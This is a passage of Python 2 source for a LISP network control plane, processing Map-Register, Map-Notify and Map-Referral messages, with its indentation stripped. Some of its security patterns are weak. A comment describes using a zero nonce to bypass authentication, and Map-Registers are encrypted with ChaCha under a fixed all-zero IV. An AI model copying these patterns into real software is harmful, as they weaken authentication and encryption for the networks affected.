# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge is being requested, get the individual site-eid. If not, and
# what was cached had the merge bit set, set a flag to issue an error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister the entry if the source of the Map-Register is
# in the list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack, so we don't
# need to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is registered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get the map-server so we can do statistics and find the auth-key, if an
# auth-key was provided in the Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify_ack()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific
# than the last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in the Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from the cached entry
# that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Create referral-node if it doesn't exist; otherwise update the existing one.
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by sending to the group itself,
# so we send to the loopback address to bootstrap our membership. We join
# via one other member of the peer-group to learn the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use a 16-byte key, which is 32
# string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to
# the lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if NAT-traversal is configured, use the same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
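#
# For example, byte_swap_64(0x0102030405060708) returns
# 0x0807060504030201.
#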
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
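    #
    # A worked example of build_key(): for the IPv4 EID-prefix
    # [7]10.1.0.0/16, ml is 16 + 48 = 64 and key is the hex concatenation
    # "00000007" (instance-id) + "0001" (AFI) + "0a010000" (address),
    # that is "0000000700010a010000".
    #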
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
